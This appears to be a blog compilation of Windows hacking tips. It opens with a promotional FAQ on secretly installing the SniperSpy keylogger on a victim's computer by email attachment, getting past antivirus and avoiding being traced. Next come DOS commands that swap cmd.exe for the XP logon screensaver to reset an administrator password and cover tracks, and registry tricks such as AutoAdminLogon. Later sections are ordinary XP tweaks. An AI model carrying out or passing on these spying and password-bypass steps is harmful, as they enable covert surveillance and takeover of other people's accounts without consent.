What Is Keylogger ?

Here is a DETAILED tutorial which contains every possible information that you need to know about keyloggers which includes how to use it, how it works etc.

WARNING: I highly recommend that you read this post completely since every single piece of information is important.
I know most of you are new to the concept of keyloggers. For some of you, this might be the first time you heard about the term “keylogger”. So to give you a clear picture and make you understand better I would like to take up this post in the form of FAQs (Frequently Asked Questions). Here we go…

1. What is a Keylogger?
A keylogger (also called as spy software) is a small program that monitors each and every keystroke a user types on a specific computer’s keyboard. A keylogger program can be installed just in a few seconds and once installed you are only a step away from getting the victim’s password.

2. How Keylogger works?
Once the keylogger is installed on a PC, it starts operating in the background (stealth mode) and captures every keystroke of the victim on that PC. Let’s take up a small example: The victim goes to http://mail.yahoo.com and types his “username” and the “password” in the respective fields to login. The keylogger silently records these keystrokes and stores them in the logs. These logs when opened up shows the captured “username” and “password” and will also tell you that they were typed in the Yahoo login page. Thus the keylogger loads upon every startup, runs in the background and captures each and every keystroke.

3. How to install the keylogger?
A keylogger can be installed just like any other program. Just follow the screen instructions and you’re done.

4. Do I need any special knowledge to install and use the keylogger?
Absolutely NOT! Anyone with a basic computer knowledge can install and use the keylogger. It requires no special skills.

5. Once I install the keylogger can the victim come to know about it’s presence?
No. The victim will never come to know about the presence of the keylogger on his/her computer. This is because, once installed the keylogger will run in total stealth mode. Unlike other programs it will never show up in start-menu, start-up, program files, add/remove programs and task manager. So the victim can no way identify it’s presence on his/her PC.

6. Can I be traced back if I install the keylogger on some other computer?
No, it’s almost impossible to trace back to you for installing the keylogger on other’s PC.

7. Which keylogger is the best?
Today there exists hundreds of keyloggers on the market and most of them are no more than a scam. So I tested some of the top keyloggers and conclude that the following is the best one.
SniperSpy

8. How SniperSpy works?
I will try to explain the working of Sniperspy in simple steps.
1. After you purchase Sniperspy, you’ll be able to create the installation module using easy set-up program. You need to email this module to the remote user as an attachment.
2. When the remote user runs the module it’ll get installed silently and monitoring process will begin. The keystrokes are captured and uploaded to the SniperSpy servers continously.
3. You can login to your Sniperspy account (you get this after purchase) to see the logs which contains the password.

9. I don’t have physical access to the traget computer. Can I still use SniperSpy?
Yes you can. SniperSpy supports REMOTE INSTALLATION feature which allows you to remotely install the program on any PC even if you have no physical access to it. For remote installation all you need to do is just place the module (refer FAQ-8) in a .zip/.rar file and send it as an attachment to the target email address (for which you need the password).

10. Can I install SniperSpy on a local computer?
If you need to install to your local (current) computer instead of your remote computer, then the process is simple. Simply navigate to the folder in which you saved your module ( Refer FAQ-8). Double-click the module filename to execute it. Nothing will appear on the screen as the software is installed.

11. What if the antivirus block from sending it as an email attachment?
Instead of sending the keylogger as an email attachment, it is recommended that you place the file in .ZIP/.RAR format and upload it to www.fileden.com. After uploading, just send the direct download link to the victim via email. Once he downloads the file from this link and run it, the keylogger will get installed automatically.

12. Why SniperSpy is the best?
SniperSpy supports REMOTE INSTALLATION feature. This feature is not present on most of the keyloggers.
SniperSpy is fully compatible with Windows 98/ME/2000/XP/Vista and bypasses ANY Firewall.
SniperSpy is more reliable than any other keylogger program. You need not rely on your email account to receive the logs. Instead you can just login to your online SniperSpy account to receive the logs.
SniperSpy captures full-size screenshots of the activities on the target PC.
Records BOTH sides of chats / IMs in Google Talk, Yahoo IM, Windows Live and more.
SniperSpy is more easy to install and requires no extra knowledge.
SniperSpy is recognized by BBC, CNN, CBS and other news networks. Hence it is reputed and trustworthy.

13. How safe is to use SniperSpy?
Sniperspy is completely safe to use since all the customer databases remain confidential and private. SniperSpy do not collect any information from your system other than the information required for the product’s successful operation. They will not contact you in any way unless you request assistance.

14. Is my online order 100% Safe and Secure?
Absolutely Yes! All the e-commerce transactions for SniperSpy is handled by Plimus – they are a trusted online retailer specializing in digitally delivered products. All your information remains private and secure. The safety and protection of your personal information is 100% guaranteed. So you can place your order for SniperSpy with no worries of scam!

How to hack windows XP admin password
If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:
cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos
Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command minus the quotes
"net user <admin account name here> password"
If the Administrator Account is called Frank and you want the password blah enter this
"net user Frank blah"
and this changes the password on franks machine to blah and your in.
Have fun
p.s: don't forget to copy the contents of temphack back into the system32 dir to cover tracks

Registry Hacking
Display legal notice on startup:
Wanna tell your friends about the do's and dont's in your computer when they login in your absence. Well you can do it pretty easily by displaying a legal notice at system start up.
REGEDIT
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"legalnoticecaption"="enter your notice caption"
"legalnoticetext"="enter your legal notice text"

Automatic Administrator Login:
Well here's the trick which you can use to prove that Windows XP is not at all secure as multi-user operating system. Hacking the system registry from any account having access to system registry puts you in to the administrator account.
REGEDIT 4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"AutoAdminLogon"="1"

No Shutdown:
Wanna play with your friends by removing the shutdown option from start menu in their computer.
Just hack it down !!!
Regedit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
"NoClose"="DWORD:1"

Menu Delays:
Another minor and easy tweak to remove any delay from menus sliding out. For this you will need to use regedit (open regedit by going to Start -> Run..., then typing 'regedit' and pressing enter). The key you need to change is located in HKEY_CURRENT_USERControl PanelDesktop. The actual key is called MenuShowDelay - all you have to do is change the value to 0. Remember, you will have to re-boot your computer for this tweak to take effect.

GPEDIT.MSC And Autoplay
A great tweaking file that comes with XP is gpedit.msc. Go to Start -> Run... and then type in 'gpedit.msc' and press enter. This is effectively the Policies Editor, and it comes in handy often. For example, if you hate CD autoplay like I do and want to permanently disable it, you can use this tool to do so. Just run gpedit.msc, then go to Computer Configuration -> Administrative Templates -> System. In here you can see the value 'Turn Off Autoplay'. Right-click on it and then click 'Properties'.

Increasing options in add/remove programs:
Not a fan of MSN Messenger? don't want Windows Media Player on your system? Fair enough, but if you go to Add/Remove Programs in the Control Panel, by default none of Windows XP's 'built in' programs are visible. it's fairly easy to change, though... just open the file X:\Windows\inf\sysoc.inf (where X: is the drive letter where Windows XP is installed) in Notepad. You should see a section of the file something like this:

[Components]
NtComponents=ntoc.dll,NtOcSetupProc,,4
WBEM=ocgen.dll,OcEntry,wbemoc.inf,hide,7
Display=desk.cpl,DisplayOcSetupProc,,7
Fax=fxsocm.dll,FaxOcmSetupProc,fxsocm.inf,,7
NetOC=netoc.dll,NetOcSetupProc,netoc.inf,,7
iis=iis.dll,OcEntry,iis.inf,,7
com=comsetup.dll,OcEntry,comnt5.inf,hide,7
dtc=msdtcstp.dll,OcEntry,dtcnt5.inf,hide,7
IndexSrv_System = setupqry.dll,IndexSrv,setupqry.inf,,7
TerminalServer=TsOc.dll, HydraOc, TsOc.inf,hide,2
msmq=msmqocm.dll,MsmqOcm,msmqocm.inf,,6
ims=imsinsnt.dll,OcEntry,ims.inf,,7
fp_extensions=fp40ext.dll,FrontPage4Extensions,fp40ext.inf,,7
AutoUpdate=ocgen.dll,OcEntry,au.inf,hide,7
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
RootAutoUpdate=ocgen.dll,OcEntry,rootau.inf,,7
IEAccess=ocgen.dll,OcEntry,ieaccess.inf,,7

This is a list of all components installed at the moment. I've taken the example of MSN Messenger - the program entry called 'msmsgs', third-last line. You can see the word 'hide' highlighted - this is the string which tells Windows not to display the component in the Add/Remove Programs list. Fix this up by simply deleting the word 'hide' like so:
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
To this:
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,,7
Now, after restarting, you should be able to see MSN Messenger in the Add/Remove Programs list. If you want to be able to quickly view and remove all components, simply open the sysoc.inf file and do a global find and replace for the word ",hide" and replace it with a single comma ",".

Automatically Kill Programs At Shutdown:
don't you hate it when, while trying to shut down, you get message boxes telling you that a program is still running? Making it so that Windows automatically kills applications running is a snap. Simply navigate to the HKEY_CURRENT_USERControl PanelDesktop directory in the Registry, then alter the key AutoEndTasks to the value 1.

Speeding Up Share Viewing:
This is a great tweak. Before I found it, I was always smashing my head against the table waiting to view shares on other computers. Basically, when you connect to another computer with Windows XP, it checks for any Scheduled tasks on that computer - a fairly useless task, but one that can add up to 30 seconds of waiting on the other end - not good! Fortunately, it's fairly easy to disable this process. First, navigate to HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Current Version/Explorer/RemoteComputer/NameSpace in the Registry. Below that, there should be a key called {D6277990-4C6A-11CF-8D87-00AA0060F5BF}. Just delete this, and after a restart, Windows will no longer check for scheduled tasks - mucho performance improvement!

Create a Shortcut to Lock Your Computer
Leaving your computer in a hurry but you don’t want to log off? You can double-click a shortcut on your desktop to quickly lock the keyboard and display without using CTRL+ALT+DEL or a screen saver. To create a shortcut on your desktop to lock your computer: Right-click the desktop. Point to New, and then click Shortcut. The Create Shortcut Wizard opens. In the text box, type the following: rundll32.exe user32.dll,LockWorkStation Click Next. Enter a name for the shortcut. You can call it "Lock Workstation" or choose any name you like. Click Finish. You can also change the shortcut's icon (my personal favorite is the padlock icon in shell32.dll). To change the icon: Right click the shortcut and then select Properties. Click the Shortcut tab, and then click the Change Icon button. In the Look for icons in this file text box, type: Shell32.dll. Click OK. Select one of the icons from the list and then click OK You could also give it a shortcut keystroke such CTRL+ALT+L. This would save you only one keystroke from the normal command, but it could be more convenient.

For some reason, the Favorites menu in IE 6 seems to slow down dramatically sometimes--I've noticed this happens when you install Tweak UI 1.33, for example, and when you use the preview tip to speed up the Start menu. But here's a fix for the problem that does work, though it's unclear why: Just open a command line window (Start button -> Run -> cmd) and type sfc, then hit ENTER. This command line runs the System File Checker, which performs a number of services, all of which are completely unrelated to IE 6. But there you go: It works.

ASPI
WinXP does not come with an Aspi layer. So far almost 90% of the problems with WinXP and CD burning software are Aspi layer problems. After installing WinXP, before installing any CD burning software do a few things first: 1. Open up "My computer" and right click on the CD Recorder. If your CD recorder was detected as a CD recorder there will be a tab called "Recording". On this tab uncheck ALL of the boxes. apply or OK out of it and close my computer. 2. Next install the standard Aspi layer for NT. Reboot when asked. That's is. after the reboot you can install any of the currently working CD recording applications with no problems. If using CD Creator do not install direct CD or Take two as they a

How To Clone A Hard Disk

Making an image or Cloning Hard disk
Did know that you could clone your current Hard Drive without having to by extra software? Maybe you didn't know that all that you needed, was already set up on your current system? Well, it is... and if you follow this tut, you shouldn't have much of a problem.

Make sure that you have a Master and a Slave setup on your system. The Slave drive, in this case, is where all the data on the Master is going to go to.

First: Perform a Scandisk your Master drive and follow that with a thorough Defrag. If you have an Antivirus program, do a thorough sweep with the AV first, then do the Scandisk, followed by the Defrag.

Second: Do the same thing to the target drive, as you did the Master: Scandisk then a thorough Defrag.

Third: Right-click on the Target drive and click on Format. When the box comes up, click your mouse onto the "Full" button.

Fourth: After Formatting the Target drive, run a Scandisk again and click on the button that says "Autofix Errors".

Fifth: In this final part, you might want to cut-and-paste to code in, unless you are sure that you can do it without making any mistakes:

Click on the "Start" button, then click on the "Run..." button, then place the following into the Runbox:
"XCOPY C:\*.*D:\ /c/h/e/k/r" (minus the quotes, of course) then press the "Enter" button.

If you receive an error message, then remove the space from between XCOPY and C:\
Anything that should happen to come up in the DOS box, just click "Y" for "Yes". When its all finished, pull the original Master from the system, designate the Slave as the Master (change your jumpers), then check your new Master out.
This tut has worked and has been tested on all systems except for Windows 2000, so you really shouldn't have any problems. If, by any chance, you should come across a snag, message me and I'll walk you through it.

Folder Option Missing ???

Many of us sometimes find the folder options missing in windows explorer due to some virus or trojan effect.
Here's the solution-->
Open Run and then type "gpedit.msc".
Now goto User Configuration > Administrative templates > Windows Component > Windows Explorer.
Click on Windows Explorer you will find the 3rd option on the right side of screen "Removes the Folder Option menu item from the Tools menu"
Just check it, if it is not configured then change it to enable by double clicking on it and after applying again set it to not configured.
I hopes that you will find the option after restarting windows..

Add Command Prompt In Right Click Menu.

Customizing Windows Explorer Context menu (right click menu in windows explorer)
Ever wondered how does the right click menu (which is actually a context menu) work ? For example, when I right click in windows explorer, I see an option which says "open command window here". Do You know why I see this ? Well I see this because I have following entries in my registry.
[HKEY_CLASSES_ROOT\Drive\shell\cmd]
@="Open Command Window Here"
[HKEY_CLASSES_ROOT\Drive\shell\cmd\command]
@="C:\WINDOWS\System32\cmd.exe /k cd "%1""
If You have never used a tweaking utility and have newly installed Windows XP, You would not see this option. You would have to navigate to [[HKEY_CLASSES_ROOT\Drive] go and create two subkeys ("cmd" and within that "command" and would have to put the text "Open Command Window Here" without quotes in default string value of "cmd" key and the text "C:\WINDOWS\System32\cmd.exe /k CD"%1"" without quotes in default string value of command key). After this You need to REBOOT for these changes to take effect.
Trick is in adding similar entries for other applications as well even though its much harder to come with ideas about what to put in the context menu!!!! .

MAKE YOUR MENUS LOAD FASTER
This is one of my favorite tweaks as it makes a huge difference to how fast your machine will 'feel'. What this tweak does is remove the slight delay between clicking on a menu and XP displaying the menu.
Go to Start then Run
Type 'Regedit' then click 'Ok'
Find "HKEY_CURRENT_USER\Control Panel\Desktop\
Select "MenuShowDelay"
Right click and select "Modify'
Reduce the number to around "100"
This is the delay time before a menu is opened. You can set it to "0" but it can make windows really hard to use as menus will open if you just look at them - well move your mouse over them anyway. I tend to go for anywhere between 50-150 depending on my mood.

How To Enable Administrator In Welcome Screen

When you install Windows XP an Administrator Account is created (you are asked to supply an administrator password), but the "Welcome Screen" does not give you the option to log on as Administrator unless you boot up in Safe Mode.

First you must ensure that the Administrator Account is enabled:

  • Open Control Panel
  • Open Administrative Tools
  • Open Local Security Policy
  • Expand Local Policies
  • Click on Security Options

Ensure that Accounts: Administrator account status is enabled.
Then follow the instructions from the "Win2000 Logon Screen Tweak" ie;

  • Open Control Panel
  • Open User Accounts
  • Click Change the way users log on or log off
  • Un-tick Use the Welcome Screen
  • Click Apply Options

You will now be able to log on to Windows XP as Administrator in Normal Mode.

Another Method
By default windows XP doesn't show the Administrator in the user list at the welcome screen. Here's a way to get around it.
Now head up to HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\
Winlogon\SpecialAccounts\Userlist
Create a new DWORD entry and name it as Administrator and change its value to 1.
exit and reboot for the changes to take effect.
To change it back change its value to 0 or simply delete the key.

How To Convert FAT To NTFS file System In Window Xp

Learn To Change file System FAT TO NTFS In XP Without Format
As We Know That We Can Change The File System In Window 7 Easily By Right Click->Format.,But The option To Change File System For Usb Is Not Available In Windows XP. So I Have A trick To Convert The File System Of Usb From FAT To NTFS.
The Main Benifit Of This Trick Is That We Did not Need To Format The Drive To Change Its File System

To convert a FAT partition to NTFS, perform the following steps.
Click Start, click Programs, and then click Command Prompt. In Windows XP, click Start, click Run, type cmd and then click OK.
At the command prompt, type CONVERT [driveletter]: /FS:NTFS. Convert.exe will attempt to convert the partition to NTFS.

NOTE: Although the chance of corruption or data loss during the conversion from FAT to NTFS is minimal, it is best to perform a full backup of the data on the drive that it is to be converted prior to executing the convert command.

How to Customize Drive icons Without Softwares In Windows

In this trick i will show you how to change the drive icons that appear in My computer.

I Have Two Method Of Changing Drives icon. I Like The Registry Tweak Method. Let Me Describe You Both The Methods.Works on Windows XP, Vista, 7 & 8.

First Method:
For this you need an icon image i.e.; with extension "ICO" example "drivea.ico"
Copy the icon file to the root of the drive.
example: c:\drivea.ico
Then create a file called: autorun.inf in the root directory c:\autorun.inf.
Simply Right click->New->Text Document. Rename it to autorun.inf (.inf is Extension)
Next open that file and type the following:
[autorun]
icon=drivea.ico
Save and close the file.
Now open my computer and refresh.. and woh! icon changed....
you can apply to other drives too.

Note: "autorun.inf" and "ico.ico" must be in the root of the drive.
example: c:\autorun.inf and c:\drivea.ico.
same on the root.

Second Method:
The Another Method For Changing Drive Icon Is RegEdit Tweak.
For This You Have To make Some Changes In RegEdit. The Whole Process Is Describe as Below:
Goto START - RUN - Regedit
Goto -- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Right Click on Explorer and Add New Key Named " DriveIcons" without Quotes.
Now Make A New Key In DriveIcons Names Your drive Letter Ex. "C","D","E" etc.
Make another Key in It And Give Name "DefaultIcon"
In DefaultIcon Goto Rightpane and Double Click on The File String Value
Now Give The Full Path Of Your Icon File In It .
